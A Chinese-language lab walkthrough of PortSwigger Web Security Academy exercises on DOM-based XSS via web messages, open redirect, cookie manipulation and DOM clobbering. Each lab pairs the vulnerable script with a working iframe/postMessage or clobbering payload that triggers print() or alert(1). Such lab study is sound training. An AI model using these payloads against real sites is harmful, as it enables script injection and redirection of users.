使用网络消息的 DOM XSS

image-20221204171531956

image-20221204171542526

html
<script>
    window.addEventListener('message', function (e) {
        //e代表event事件
        document.getElementById('ads').innerHTML = e.data;
    })
</script>

IFrame消息传递

http://runxinzhi.com/ms-grf-p-11545290.html

plaintext
<iframe src="https://0a2f00890488e7a6c0f2c14d008b00e0.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

image-20221204173448915

使用网络消息和 JavaScript URL 的 DOM XSS

image-20221204173756754

image-20221204173827978

html
<script>
    window.addEventListener('message', function (e) {
        var url = e.data;
        if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
            location.href = url;
        }
    }, false);
</script>

这里做了过滤 但是有缺陷

plaintext
<iframe src="https://0a21004d04ed6de4c03702320011003f.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')"></iframe>

image-20221204174110253

DOM XSS 使用网络消息和JSON.parse

image-20221204175202244

html
<script>
    window.addEventListener('message', function (e) {
        var iframe = document.createElement('iframe'), ACMEplayer = {element: iframe}, d;
        //这里是 先创建一个 iframe 接着将ACMEplayer的element赋值成iframe
        document.body.appendChild(iframe);
        try {
            d = JSON.parse(e.data);
            //解析event获取中的data
        } catch (e) {
            return;
        }
        switch (d.type) {
            case "page-load":
                ACMEplayer.element.scrollIntoView();
                break;
            case "load-channel":
                ACMEplayer.element.src = d.url;
                break;
            case "player-height-changed":
                ACMEplayer.element.style.width = d.width + "px";
                ACMEplayer.element.style.height = d.height + "px";
                break;
        }
    }, false);
</script>
plaintext
<iframe src=https://0a3200ce04cdb6cdc0af6734007c006d.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'></iframe>

image-20221204180539053

基于 DOM 的开放式重定向

image-20221204204508634

image-20221204204720975

plaintext
https://0a39001b0312d431c0493d9400b70041.web-security-academy.net/post?postId=1&url=https://exploit-0aaa00b803e9d4d3c0323fda01ab001b.exploit-server.net/

image-20221204205225746

基于 DOM 的 cookie 操作

image-20221204205433367

image-20221204210203572

会将cookie填入url

html
<script>
    document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</script>

cookie中存在一个url 这里将url 填入了cookie中去 其中我们可以尝试出 ‘ 存在逃逸

image-20221204210003200

plaintext
<iframe src="https://0ac900e1049a54cdc054d67300df007f.web-security-academy.net/product?productId=2&'><script>print()</script>" onload="if(!window.x)this.src='https://exploit-0a5800e104835458c0ced85701d700b6.exploit-server.net/';window.x=1;">

image-20221204211306927

利用 DOM 破坏来启用 XSS

image-20221204212844651

image-20221204212837919

plaintext
<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">

image-20221204231040112

image-20221204231125349

image-20221204231212018

破坏 DOM 属性以绕过 HTML 过滤器

image-20221204231402671

plaintext
<form onclick=alert(1)><input id=attributes>Click me

image-20221204232458284

plaintext
<iframe src=https://0aae0085044793c3c0c84cc700c000db.web-security-academy.net/post?postId=3 onload="setTimeout(()=>this.src=this.src+'#x',500)">

image-20221204232518653